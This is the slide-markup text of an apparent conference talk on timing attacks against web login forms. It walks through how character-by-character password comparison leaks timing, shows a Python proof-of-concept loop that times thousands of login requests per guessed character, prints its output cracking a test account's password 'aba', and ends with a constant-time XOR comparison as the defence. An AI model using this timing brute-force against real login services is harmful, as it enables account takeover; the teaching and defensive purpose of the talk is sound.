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2644632-7159-43C4-BBA7-79F78FF25F05}">
  <a:tblStyle styleId="{82644632-7159-43C4-BBA7-79F78FF25F0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bjh7242/httptim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Statistics: Why Time Isn’t Always Money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PoC Output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Guessing password begins with: 'a'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aa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'a' was 96.5585160255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ab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'b' was 96.7385187149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ac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'c' was 96.581807375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ad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'd' was 96.8448004723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ae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'e' was 96.6286518574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Average time per request for each password guess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a: 0.0482792580128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c: 0.0482909036875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e: 0.0483143259287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b: 0.0483692593575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d: 0.0484224002361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Guessing password begins with: '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ad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'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>' != '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ab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Number of failed timing attack attempts: 16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PoC Output - Final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0000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Guessing password begins with: 'a'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aa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'a' was 97.0304768085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ab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'b' was 97.8620438576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ac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'c' was 97.6188161373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ad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'd' was 97.6770935059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Sending 2000 requests to the server for the password '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ae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Total time to make 2000 requests for 'e' was 97.2542243004 seconds.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Average time per request for each password guess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a: 0.0485152384043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e: 0.0486271121502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c: 0.0488094080687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d: 0.0488385467529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b: 0.0489310219288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Guessing password begins with: '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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Sending 2000 requests to the server for the password 'aba'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SUCCESS: Number of failed timing attack attempts before success: 17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Successfully logged in! Username: test Password: aba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Results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119" y="956650"/>
            <a:ext cx="5245756" cy="40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You Defend Against This?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than rate limiting...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Review on Truth Tables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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>request.username == db.username </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>request.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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0 0 1 0 1 0 0 0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XOR  0 0 1 0 1 0 0 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0 0 0 0 0 0 0 0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485325" y="13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{82644632-7159-43C4-BBA7-79F78FF25F05}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
              </a:tblGrid>
              <a:tr h="4677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/>
                        <a:t>AND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67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/>
                </a:tc>
              </a:tr>
              <a:tr h="467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3297850" y="1403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{82644632-7159-43C4-BBA7-79F78FF25F05}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
              </a:tblGrid>
              <a:tr h="458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/>
                        <a:t>OR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58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/>
                </a:tc>
              </a:tr>
              <a:tr h="458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Shape 143"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6141362" y="140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{82644632-7159-43C4-BBA7-79F78FF25F05}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
                <a:gridCol w="871575"/>
              </a:tblGrid>
              <a:tr h="467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 u="sng"/>
                        <a:t>XOR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6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/>
                </a:tc>
              </a:tr>
              <a:tr h="46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False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Your Server Side Code...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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>request.username == db.username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>&amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>request.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>db.password == 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>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// do login stuff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Print “Invalid username/password combination”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912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https://github.com/bjh7242/httptimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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1019650"/>
            <a:ext cx="8520600" cy="200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Attacks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Attacks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attack on a cryptosystem that analyzes the time it takes for a computer to execute an operation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This takes a shit ton of time because you need a large dataset to get the correct values :(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Request Containing username ‘test’ and password ‘abc’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Pseudocode for Login Form (Server Side)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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>request.username == db.username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>request.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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do login stuff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Print “Invalid username/password combination”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Request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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘test’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘test’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘abc’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘abc’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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do login stuff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Print “Invalid username/password combination”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Attack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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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do login stuff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Print “Invalid username/password combination”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Attack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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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do login stuff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Print “Invalid username/password combination”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Proof Of Concept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for i in range(0,NUMREQUESTS):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start = time.time()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0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># make request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r = requests.post(URL, data=parameters)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end = time.time()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0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># if the response doesn't contain the following string, you successfully logged in and now have the password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if FAILLOGINMESSAGE not in r.text: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    print "SUCCESS: Number of failed timing attack attempts before success: " + str(FAILEDPOCS)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    print "Successfully logged in! Username: " + USERNAME + " Password: " + newguess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sys.exit()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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># add the time it took to make the request to the list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chartimes[c] += end - start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if i == NUMREQUESTS-1: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    print "Total time to make " + str(NUMREQUESTS) + " requests for '" + c + "' was " + str(chartimes[c]) + " seconds."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